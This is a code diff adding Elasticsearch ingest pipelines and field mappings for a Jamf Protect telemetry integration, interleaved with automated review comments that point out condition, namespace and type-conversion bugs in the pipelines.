--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_event.yml
@@ -0,0 +1,83 @@
+---
+description: Pipeline for Jamf Protect Telemetry event logs.
+processors:
+ - set:
+ field: event.kind
+ value: event
+ - set:
+ field: jamf_protect.telemetry.dataset
+ value: event
+ - append:
+ field: event.category
+ value: process
+ - set:
+ field: host.os.type
+ value: macos
+ - append:
+ field: event.type
+ value: info
+ - convert:
+ field: json._event_score
+ target_field: jamf_protect.telemetry.event_score
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.header.event_name
+ target_field: event.action
+ ignore_missing: true
+ - lowercase:
+ field: event.action
+ ignore_missing: true
+ - date:
+ field: json.header.time_seconds_epoch
+ if: ctx.json?.header?.time_seconds_epoch != 0
+ formats:
+ - UNIX
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.host_info.host_name
+ target_field: host.hostname
+ ignore_missing: true
+ - append:
+ field: related.hosts
+ value: '{{{host.hostname}}}'
+ if: ctx.host?.hostname != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.host_info.host_uuid
+ target_field: jamf_protect.telemetry.host_info.host.uuid
+ ignore_missing: true
+ - rename:
+ field: json.host_info.osversion
+ target_field: host.os.version
+ ignore_missing: true
+ - append:
+ field: host.mac
+ value: '{{{json.host_info.primary_mac_address}}}'
+ if: ctx.json?.host_info?.primary_mac_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - gsub:
+ field: host.mac
+ pattern: '[-:.]'
+ replacement: '-'
+ ignore_missing: true
+ - uppercase:
+ field: host.mac
+ ignore_missing: true
+ - rename:
+ field: json.host_info.serial_number
+ target_field: host.id
+ ignore_missing: true
+on_failure:
+ - append:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
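Review bot: The `date` processor's condition `if: ctx.json?.header?.time_seconds_epoch != 0` is also true when the header field is absent (`null != 0` evaluates true in Painless), so every event without it runs the processor against a missing field and collects an `error.message` entry from the `on_failure` block. Tighten it to `if: ctx.json?.header?.time_seconds_epoch != null && ctx.json.header.time_seconds_epoch != 0`. The same condition appears in the pipeline_system_performance_metrics.yml hunk further down. When the processor is skipped, `@timestamp` presumably stays at whatever the shipper set rather than the audit time, which is worth a one-line comment next to the processor since it affects time-based correlation of these events.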
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml
new file mode 100644
index 00000000000..790f00422f9
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_exec_chain_child_object.yml
@@ -0,0 +1,20 @@
+---
+description: Pipeline for Jamf Protect Telemetry exec_chain_child_object audit logs.
+processors:
+ - rename:
+ field: json.exec_chain_child.parent_path
+ target_field: jamf_protect.telemetry.exec_chain_child.parent.path
+ ignore_missing: true
+ - convert:
+ field: json.exec_chain_child.parent_pid
+ target_field: process.parent.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.exec_chain_child.parent_uuid
+ target_field: jamf_protect.telemetry.exec_chain_child.parent.uuid
+ ignore_missing: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml
new file mode 100644
index 00000000000..69170ac5549
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_identity_object.yml
@@ -0,0 +1,33 @@
+---
+description: Pipeline for Jamf Protect Telemetry identity_object audit logs.
+processors:
+ - rename:
+ field: json.identity.cd_hash
+ target_field: jamf_protect.telemetry.identity.cd_hash
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{jamf_protect.telemetry.identity.cd_hash}}}'
+ if: ctx.jamf_compliance_reporter?.log?.identity?.cd_hash != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.identity.signer_id
+ target_field: process.code_signature.signing_id
+ ignore_missing: true
+ - convert:
+ field: json.identity.signer_id_truncated
+ target_field: jamf_protect.telemetry.identity.signer.id_truncated
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.identity.signer_type
+ target_field: jamf_protect.telemetry.identity.signer.type
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.identity.team_id
+ target_field: process.code_signature.team_id
+ ignore_missing: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml
new file mode 100644
index 00000000000..5c4571a5ed3
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_process_object.yml
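Review bot: The `related.hash` append is guarded by `if: ctx.jamf_compliance_reporter?.log?.identity?.cd_hash != null`, which names another integration's namespace, so the condition is never satisfied by documents in this package and `related.hash` is never populated from `cd_hash`; the `value` template on the line above already uses the correct `jamf_protect.telemetry.identity.cd_hash` path. Change the guard to `if: ctx.jamf_protect?.telemetry?.identity?.cd_hash != null`. The same carried-over condition appears three times in the pipeline_process_object.yml hunk (both `related.user` appends and the `related.ip` append), so those pivot fields are silently left empty for process events as well.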
@@ -0,0 +1,146 @@
+---
+description: Pipeline for Jamf process_object audit logs.
+processors:
+ - convert:
+ field: json.process.audit_id
+ target_field: jamf_protect.telemetry.process.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.process.effective_group_id
+ target_field: jamf_protect.telemetry.process.effective.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.process.effective_group_name
+ target_field: jamf_protect.telemetry.process.effective.group.name
+ ignore_missing: true
+ - convert:
+ field: json.process.effective_user_id
+ target_field: jamf_protect.telemetry.process.effective.user.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - append:
+ field: user.effective.id
+ value: '{{{json.process.effective_user_id}}}'
+ if: ctx.json?.process?.effective_user_id != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: user.effective.name
+ value: '{{{json.process.effective_user_name}}}'
+ if: ctx.json?.process?.effective_user_name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.process.effective_user_name
+ target_field: jamf_protect.telemetry.process.effective.user.name
+ ignore_missing: true
+ - append:
+ field: related.user
+ value: '{{{jamf_protect.telemetry.process.effective.user.name}}}'
+ if: ctx.jamf_compliance_reporter?.log?.process?.effective?.user?.name != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.process.group_id
+ target_field: jamf_protect.telemetry.process.group.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.process.group_name
+ target_field: jamf_protect.telemetry.process.group.name
+ ignore_missing: true
+ - append:
+ field: process.hash.sha1
+ value: '{{{json.process.process_hash}}}'
+ if: ctx.json?.process?.process_hash != null
+ allow_duplicates: false
+ ignore_failure: true
+ - append:
+ field: related.hash
+ value: '{{{json.process.process_hash}}}'
+ if: ctx.json?.process?.process_hash != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.process.process_id
+ target_field: process.pid
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.process.process_name
+ target_field: process.name
+ ignore_missing: true
+ - convert:
+ field: json.process.session_id
+ target_field: jamf_protect.telemetry.process.session.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.process.terminal_id.addr
+ target_field: jamf_protect.telemetry.process.terminal_id.addr
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.process.terminal_id.ip_address
+ target_field: jamf_protect.telemetry.process.terminal_id.ip_address
+ type: ip
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: json.process.terminal_id.ip_address
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - append:
+ field: related.ip
+ value: '{{{jamf_protect.telemetry.process.terminal_id.ip_address}}}'
+ if: ctx.jamf_compliance_reporter?.log?.process?.terminal_id?.ip_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - convert:
+ field: json.process.terminal_id.port
+ target_field: jamf_protect.telemetry.process.terminal_id.port
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.process.terminal_id.type
+ target_field: jamf_protect.telemetry.process.terminal_id.type
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - convert:
+ field: json.process.user_id
+ target_field: process.user.id
+ type: string
+ ignore_missing: true
+ ignore_failure: true
+ - rename:
+ field: json.process.user_name
+ target_field: jamf_protect.telemetry.process.user.name
+ ignore_missing: true
+ - append:
+ field: related.user
+ value: '{{{jamf_protect.telemetry.process.user.name}}}'
+ if: ctx.jamf_compliance_reporter?.log?.process?.user?.name != null
+ allow_duplicates: false
+ ignore_failure: true
diff --git a/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml
new file mode 100644
index 00000000000..0fb4ea6fdc5
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/elasticsearch/ingest_pipeline/pipeline_system_performance_metrics.yml
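Review bot: `json.process.user_name` is only renamed into the custom `jamf_protect.telemetry.process.user.name`, while its sibling `json.process.user_id` is converted into ECS `process.user.id`; `process.user.name` is declared in fields/ecs.yml in this commit but nothing in this hunk fills it, so unless another pipeline does, process events carry an ECS user id with no ECS user name. Consider `target_field: process.user.name` on that rename and appending the custom copy separately, mirroring what is done for `user.effective.name` above. Separately, `process.hash.sha1` is populated from `json.process.process_hash` with no check on the digest; if the source is documented as SHA-1 only that is fine, otherwise a guard such as `if: ctx.json?.process?.process_hash != null && ctx.json.process.process_hash.length() == 40` keeps a differently sized digest out of the sha1 field.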
@@ -0,0 +1,143 @@
+---
+description: Pipeline for Jamf Protect Telemetry app metrics logs.
+processors:
+ - append:
+ field: event.type
+ value: info
+ - set:
+ field: event.kind
+ value: event
+ - set:
+ field: jamf_protect.telemetry.dataset
+ value: app_metrics
+ - set:
+ field: host.os.type
+ value: macos
+ - append:
+ field: event.category
+ value: process
+ - convert:
+ field: json._event_score
+ type: long
+ target_field: jamf_protect.telemetry.event_score
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.cpu_percentage
+ type: double
+ target_field: jamf_protect.telemetry.system_performance_metrics.cpu_percentage
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.cpu_time_seconds
+ type: double
+ target_field: jamf_protect.telemetry.system_performance_metrics.cpu_time_seconds
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.interrupt_wakeups
+ type: long
+ target_field: jamf_protect.telemetry.system_performance_metrics.interrupt_wakeups
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.platform_idle_wakeups
+ type: long
+ target_field: jamf_protect.telemetry.system_performance_metrics.platform_idle_wakeups
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.resident_memory_size_mb
+ type: double
+ target_field: jamf_protect.telemetry.system_performance_metrics.resident_memory_size.mb
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.system_performance_metrics.virtual_memory_size_mb
+ type: double
+ target_field: jamf_protect.telemetry.system_performance_metrics.virtual_memory_size.mb
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.header.event_name
+ target_field: event.action
+ ignore_missing: true
+ - lowercase:
+ field: event.action
+ ignore_missing: true
+ - date:
+ field: json.header.time_seconds_epoch
+ if: ctx.json?.header?.time_seconds_epoch != 0
+ formats:
+ - UNIX
+ on_failure:
+ - append:
+ field: error.message
+ value: '{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.host_info.host_name
+ target_field: host.hostname
+ ignore_missing: true
+ - append:
+ field: related.hosts
+ value: '{{{host.hostname}}}'
+ if: ctx.host?.hostname != null
+ allow_duplicates: false
+ ignore_failure: true
+ - rename:
+ field: json.host_info.host_uuid
+ target_field: jamf_protect.telemetry.host_info.host.uuid
+ ignore_missing: true
+ - rename:
+ field: json.host_info.osversion
+ target_field: host.os.version
+ ignore_missing: true
+ - append:
+ field: host.mac
+ value: '{{{json.host_info.primary_mac_address}}}'
+ if: ctx.json?.host_info?.primary_mac_address != null
+ allow_duplicates: false
+ ignore_failure: true
+ - gsub:
+ field: host.mac
+ pattern: '[-:.]'
+ replacement: '-'
+ ignore_missing: true
+ - uppercase:
+ field: host.mac
+ ignore_missing: true
+ - rename:
+ field: json.host_info.serial_number
+ target_field: host.id
+ ignore_missing: true
+ - script:
+ lang: painless
+ if: ctx.json?.system_performance_metrics?.cpu_percentage != null
+ source: |
+ ctx.host.cpu = new HashMap();
+ ctx.host.cpu.usage = Math.round(ctx.json?.system_performance_metrics?.cpu_percentage *10) / 1000.0;
+on_failure:
+ - append:
+ field: error.message
+ value: '{{ _ingest.on_failure_message }}'
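Review bot: The closing `script` reads the raw `ctx.json?.system_performance_metrics?.cpu_percentage` instead of the copy the earlier `convert` processor already coerced to `double` at `jamf_protect.telemetry.system_performance_metrics.cpu_percentage`; if the source delivers the value as a string, the multiplication throws and the whole document goes to the pipeline-level `on_failure` rather than just losing `host.cpu.usage`. Reading `ctx.jamf_protect?.telemetry?.system_performance_metrics?.cpu_percentage` in both the `if` and the `source` avoids that. `ctx.host.cpu = new HashMap();` also replaces any `host.cpu` object that is already present rather than adding to it; a null check before creating the map would be less surprising. The `description` says "app metrics" and `jamf_protect.telemetry.dataset` is set to `app_metrics` while the file and source object are named `system_performance_metrics`; if that naming is deliberate, a short comment at the top of the file would save the next reader the question.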
diff --git a/packages/jamf_protect/data_stream/telemetry/fields/agent.yml b/packages/jamf_protect/data_stream/telemetry/fields/agent.yml
new file mode 100644
index 00000000000..2919f7a30c6
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/fields/agent.yml
@@ -0,0 +1,183 @@
+- name: cloud
+ title: Cloud
+ group: 2
+ description: Fields related to the cloud or infrastructure the events are coming from.
+ footnote: "Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on."
+ type: group
+ fields:
+ - name: account.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: "The cloud account or organization ID used to identify different entities in a multi-tenant environment. Examples: AWS account ID, Google Cloud ORG ID, or other unique identifier."
+ example: 666777888999
+ - name: availability_zone
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Availability zone in which this host is running.
+ example: us-east-1c
+ - name: instance.id
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance ID of the host machine.
+ example: i-1234567890abcdef0
+ - name: instance.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Instance name of the host machine.
+ - name: machine.type
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Machine type of the host machine.
+ example: t2.medium
+ - name: provider
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+ example: aws
+ - name: region
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Region in which this host is running.
+ example: us-east-1
+ - name: project.id
+ type: keyword
+ description: Name of the project in Google Cloud.
+ - name: image.id
+ type: keyword
+ description: Image ID for the cloud instance.
+- name: container
+ title: Container
+ group: 2
+ description: "Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime."
+ type: group
+ fields:
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Unique container ID.
+ - name: image.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Name of the image the container was built on.
+ - name: labels
+ level: extended
+ type: object
+ object_type: keyword
+ description: Image labels.
+ - name: name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Container name.
+- name: host
+ title: Host
+ group: 2
+ description: "A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes."
+ type: group
+ fields:
+ - name: architecture
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Operating system architecture.
+ example: x86_64
+ - name: domain
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: "Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider."
+ example: CONTOSO
+ default_field: false
+ - name: hostname
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: "Hostname of the host. It normally contains what the `hostname` command returns on the host machine."
+ - name: id
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: "Unique host ID. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`."
+ - name: ip
+ level: core
+ type: ip
+ description: Host IP addresses.
+ - name: mac
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: Host mac addresses.
+ - name: name
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: "Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use."
+ - name: os.family
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: OS family (such as redhat, debian, freebsd, windows).
+ example: debian
+ - name: os.kernel
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system kernel version as a raw string.
+ example: 4.4.0-112-generic
+ - name: os.name
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ multi_fields:
+ - name: text
+ type: text
+ norms: false
+ default_field: false
+ description: Operating system name, without the version.
+ example: Mac OS X
+ - name: os.platform
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system platform (such centos, ubuntu, windows).
+ example: darwin
+ - name: os.version
+ level: extended
+ type: keyword
+ ignore_above: 1024
+ description: Operating system version as a raw string.
+ example: 10.14.1
+ - name: type
+ level: core
+ type: keyword
+ ignore_above: 1024
+ description: "Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment."
+ - name: containerized
+ type: boolean
+ description: >-
+ If the host is a container.
+ - name: os.build
+ type: keyword
+ example: "18D109"
+ description: >-
+ OS build information.
+ - name: os.codename
+ type: keyword
+ example: "stretch"
+ description: >-
+ OS codename, if any.
+- name: input.type
+ type: keyword
+ description: Input type
+- name: log.offset
+ type: long
+ description: Log offset
diff --git a/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml b/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml
new file mode 100644
index 00000000000..07a6702e13e
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: event.dataset
+ type: constant_keyword
+ description: Name of the dataset.
+ value: jamf_protect.telemetry
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: jamf_protect
+- name: "@timestamp"
+ type: date
+ description: Event timestamp.
diff --git a/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml b/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml
new file mode 100644
index 00000000000..bc907350357
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/fields/ecs.yml
@@ -0,0 +1,177 @@
+- description: |-
+ ECS version this event conforms to. `ecs.version` is a required field and must exist in all events.
+ When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events.
+ name: ecs.version
+ type: keyword
+- description: Error code describing the error.
+ name: error.code
+ type: keyword
+- description: |-
+ The action captured by the event.
+ This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer.
+ name: event.action
+ type: keyword
+- description: |-
+ This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy.
+ `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory.
+ This field is an array. This will allow proper categorization of some events that fall in multiple categories.
+ name: event.category
+ type: keyword
+- description: |-
+ Identification code for this event, if one exists.
+ Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID.
+ name: event.code
+ type: keyword
+- description: |-
+ `event.created` contains the date/time when the event was first read by an agent, or by your pipeline.
+ This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event.
+ In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source.
+ In case the two timestamps are identical, `@timestamp` should be used.
+ name: event.created
+ type: date
+- description: |-
+ This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy.
+ `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events.
+ The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not.
+ name: event.kind
+ type: keyword
+- description: |-
+ Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex.
+ This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`.
+ doc_values: false
+ index: false
+ name: event.original
+ type: keyword
+- description: |-
+ This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy.
+ `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event.
+ Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective.
+ Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer.
+ Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense.
+ name: event.outcome
+ type: keyword
+- description: |-
+ This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy.
+ `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization.
+ This field is an array. This will allow proper categorization of some events that fall in multiple event types.
+ name: event.type
+ type: keyword
+- description: SHA1 hash.
+ name: file.hash.sha1
+ type: keyword
+- description: Full path to the file, including the file name. It should include the drive letter, when appropriate.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: file.path
+ type: keyword
+- description: |-
+ Use the `os.type` field to categorize the operating system into one of the broad commercial families.
+ If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition.
+ name: host.os.type
+ type: keyword
+- description: |-
+ Array of process arguments, starting with the absolute path to the executable.
+ May be filtered to protect sensitive information.
+ name: process.args
+ type: keyword
+- description: |-
+ The exit code of the process, if this is a termination event.
+ The field should be absent if there is no exit code for the event (e.g. process start).
+ name: process.exit_code
+ type: long
+- description: SHA1 hash.
+ name: process.hash.sha1
+ type: keyword
+- description: |-
+ Process name.
+ Sometimes called program name or similar.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: process.name
+ type: keyword
+- description: Process id.
+ name: process.pid
+ type: long
+- description: Process id.
+ name: process.parent.pid
+ type: long
+- description: Unique identifier for the group on the system/platform.
+ name: process.real_group.id
+ type: keyword
+- description: Name of the group.
+ name: process.real_group.name
+ type: keyword
+- description: Unique identifier of the user.
+ name: process.real_user.id
+ type: keyword
+- description: Short name or login of the user.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: process.real_user.name
+ type: keyword
+- description: Unique identifier of the user.
+ name: process.user.id
+ type: keyword
+- description: Short name or login of the user.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: process.user.name
+ type: keyword
+- description: All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search).
+ name: related.hash
+ type: keyword
+- description: All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases.
+ name: related.hosts
+ type: keyword
+- description: All of the IPs seen on your event.
+ name: related.ip
+ type: ip
+- description: IP address of the server (IPv4 or IPv6).
+ name: server.ip
+ type: ip
+- description: Port of the server.
+ name: server.port
+ type: long
+- description: All the user names or other user identifiers seen on the event.
+ name: related.user
+ type: keyword
+- description: List of keywords used to tag each event.
+ name: tags
+ type: keyword
+- description: Unique identifier of the user.
+ name: user.effective.id
+ type: keyword
+- description: Short name or login of the user.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: user.effective.name
+ type: keyword
+- description: User email address.
+ name: user.email
+ type: keyword
+- description: Unique identifier for the group on the system/platform.
+ name: user.group.id
+ type: keyword
+- description: Name of the group.
+ name: user.group.name
+ type: keyword
+- description: Unique identifier of the user.
+ name: user.id
+ type: keyword
+- description: Short name or login of the user.
+ multi_fields:
+ - name: text
+ type: match_only_text
+ name: user.name
+ type: keyword
+- external: ecs
+ name: process.code_signature.signing_id
+- external: ecs
+ name: process.code_signature.status
+- external: ecs
+ name: process.code_signature.team_id
diff --git a/packages/jamf_protect/data_stream/telemetry/fields/fields.yml b/packages/jamf_protect/data_stream/telemetry/fields/fields.yml
new file mode 100644
index 00000000000..acd0afa74b7
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/fields/fields.yml
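Review bot: The file mixes two conventions: most ECS fields are declared inline with hand-copied descriptions, while the last three (`process.code_signature.*`) use `external: ecs`, which resolves the definition from the ECS version the package pins. Declaring every ECS field here the same way (`- external: ecs` followed by `name: event.action`, and so on for `host.os.type`, `process.*`, `related.*`, `user.*`) drops the duplicated prose and keeps the mappings in step with ECS. It also declares `server.ip`, `server.port`, `file.hash.sha1`, `user.email` and `process.real_user.*`, which none of the pipelines visible in this chunk populate; if other pipelines in the commit set them that is fine, otherwise they can be removed so the mapping reflects what is actually indexed.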
@@ -0,0 +1,656 @@ +- name: jamf_protect.telemetry + type: group + fields: + - name: arguments + type: group + fields: + - name: addr + type: keyword + - name: am_failure + type: keyword + - name: am_success + type: keyword + - name: authenticated + type: flattened + - name: child + type: group + fields: + - name: pid + type: long + - name: data + type: keyword + - name: detail + type: keyword + - name: domain + type: keyword + - name: fd + type: keyword + - name: flags + type: keyword + - name: flattened + type: flattened + - name: known_uid + type: keyword + - name: pid + type: long + - name: port + type: long + - name: priority + type: long + - name: process + type: keyword + - name: protocol + type: keyword + - name: request + type: keyword + - name: sflags + type: keyword + - name: signal + type: keyword + - name: target + type: group + fields: + - name: port + type: long + - name: task + type: group + fields: + - name: port + type: long + - name: type + type: keyword + - name: which + type: keyword + - name: who + type: keyword + - name: attributes + type: group + fields: + - name: device + type: keyword + - name: file + type: group + fields: + - name: access_mode + type: keyword + - name: system + type: group + fields: + - name: id + type: keyword + - name: node + type: group + fields: + - name: id + type: keyword + - name: owner + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: dataset + type: keyword + - name: event_attributes + type: group + fields: + - name: activity_identifier + type: keyword + - name: assessments_enabled + type: long + - name: attributes + type: group + fields: + - name: ctime + type: date + - name: mtime + type: date + - name: path + type: keyword + - name: quarantine + type: group + fields: + - name: agent_bundle_identifier + type: keyword + - name: agent_name + type: keyword + - name: data_url_string + type: keyword + - name: event_identifier + type: 
keyword + - name: origin_url_string + type: keyword + - name: timestamp + type: date + - name: requirement + type: keyword + - name: audit_event + type: group + fields: + - name: excluded_processes + type: keyword + - name: excluded_users + type: keyword + - name: audit_event_log_verbose_messages + type: keyword + - name: audit_level + type: long + - name: backtrace + type: group + fields: + - name: frames + type: group + fields: + - name: image_offset + type: long + - name: image_uuid + type: keyword + - name: build_alias_of + type: keyword + - name: build_version + type: keyword + - name: category + type: keyword + - name: cf_bundle_short_version_string + type: keyword + - name: cf_bundle_version + type: keyword + - name: dev_id_enabled + type: long + - name: event + type: group + fields: + - name: message + type: keyword + - name: type + type: keyword + - name: file_event + type: group + fields: + - name: exclusion_paths + type: keyword + - name: inclusion_paths + type: keyword + - name: use_fuzzy_match + type: long + - name: file_license_info + type: group + fields: + - name: license_expiration_date + type: date + - name: license_key + type: keyword + - name: license_type + type: keyword + - name: license_version + type: keyword + - name: format_string + type: keyword + - name: job + type: group + fields: + - name: completed_time + type: date + - name: creation_time + type: date + - name: destination + type: keyword + - name: format + type: keyword + 